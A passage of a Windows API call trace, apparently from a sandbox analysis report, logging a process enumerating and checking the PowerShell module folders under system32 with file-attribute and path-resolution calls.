[0159.591] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c7e767, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207eb5c8, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0159.591] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1d3e2ea, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0159.591] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1dbbc19, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2081182e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1dbc877, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20837aa0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e300dc, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20837aa0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e30eea, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~2")) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e319e4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e92e4b, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0159.592] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e93bbd, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x208aa1cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0159.593] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e950c4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0159.593] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1f64ff6, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0159.593] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1f65404, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0159.593] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb8b03, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0159.593] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb91fe, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0159.593] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fb9d09, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20968dca, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0159.594] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fba32e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20968dca, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0159.594] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbaba9, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0159.594] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbbc28, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0159.594] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e5be8c, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x1fbcd58, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe966970b, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UEV", cAlternateFileName="")) returned 1 [0159.594] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1fbd4ae, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0159.594] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205dc90, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0159.595] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205e730, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0159.595] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205efde, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0159.595] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x205f3c7, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2098f030, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~3")) returned 1 [0159.595] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.595] FindClose (in: hFindFile=0x76d4290 | out: hFindFile=0x76d4290) returned 1 [0159.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.596] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0159.596] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0159.596] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0159.596] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0159.596] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0159.596] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0159.596] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0159.596] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x3d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0159.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.596] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e35c2e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x1902eb1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe9611c78, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.597] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0159.597] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x3e, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", lpFilePart=0x0) returned 0x3d [0159.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.597] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e35c2e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x197a24f, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x76586f17, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.681] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0159.681] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x38, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0159.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.682] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197bc54, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.682] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0159.682] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0159.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.682] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197c4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.682] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0159.682] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x3f, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0159.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.683] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e5be8c, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x197cd93, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe966970b, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.683] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0159.684] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0159.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.684] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197d5fb, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.684] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0159.684] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x50, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0159.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.684] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19ea3b1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20706767, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.685] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0159.685] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", nBufferLength=0x38, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0159.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea74) returned 1 [0159.685] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism"), fInfoLevelId=0x0, lpFileInformation=0x86deaf0 | out: lpFileInformation=0x86deaf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19eb58e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8cfff4c6, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0159.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea70) returned 1 [0159.685] GetFullPathNameW (in: 